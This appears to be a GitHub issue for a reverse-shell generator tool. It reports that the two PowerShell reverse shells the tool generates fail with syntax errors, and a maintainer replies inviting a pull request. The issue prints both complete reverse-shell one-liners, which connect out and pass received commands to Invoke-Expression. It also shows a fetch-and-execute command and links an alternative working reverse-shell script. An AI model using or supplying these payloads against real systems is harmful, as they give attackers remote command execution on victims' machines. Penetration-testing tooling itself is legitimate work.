Open goreil opened 2 weeks ago
Both generated powershell reverse shells do not work:
I used the following command to generate the reverse shells:
# shellerator --type powershell --lport 443 --lhost 127.0.0.1 [1] powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("127.0.0.1",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() [2] powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" CLI command used /root/.local/bin/shellerator --reverse-shell --type powershell --lhost 127.0.0.1 --lport 443
Running them on a windows host yields a lot of syntax errors:
> Invoke-RestMethod '127.0.0.1/rev1.ps1' | Invoke-Expression At line:1 char:75 + ... System.Net.Sockets.TCPClient('127.0.0.1',443); = .GetStream();[byte[ ... + ~ An expression was expected after '('. At line:1 char:122 + ... = .GetStream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length ... + ~ Missing expression after ','. At line:1 char:123 + ... tream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0 ... + ~~~~~~~ Unexpected token '.Length' in expression or statement. At line:1 char:122 + ... = .GetStream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length ... + ~ Missing closing ')' in expression. At line:1 char:132 + ... eam();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){ ... + ~ Missing statement body in while loop. At line:1 char:138 + ... byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){; = (Ne ... + ~ Unexpected token ')' in expression or statement. At line:1 char:203 + ... = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = ... + ~ Missing ')' in method call. At line:1 char:206 + ... New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (i ... + ~ Missing expression after ',' in pipeline element. At line:1 char:139 + ... yte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){; = (New ... + ~ Missing closing '}' in statement block or type definition. At line:1 char:207 + ... w-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (iex ... + ~ Unexpected token ')' in expression or statement. Not all parse errors were reported. Correct the reported errors and try again. + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : ExpectedExpression
Fix: Use a working reverse shell like this one:
https://gist.githubusercontent.com/egre55/c058744a4240af6515eb32b2d33fbed3/raw/3ad91872713d60888dca95850c3f6e706231cb40/powershell_reverse_shell.ps1
Hello, thank you for raising the issue However I don't have the time to implement the fix I'd be happy to review and merge a pull request đŸ˜‰
Both generated powershell reverse shells do not work:
I used the following command to generate the reverse shells:
Running them on a windows host yields a lot of syntax errors:
Fix: Use a working reverse shell like this one:
https://gist.githubusercontent.com/egre55/c058744a4240af6515eb32b2d33fbed3/raw/3ad91872713d60888dca95850c3f6e706231cb40/powershell_reverse_shell.ps1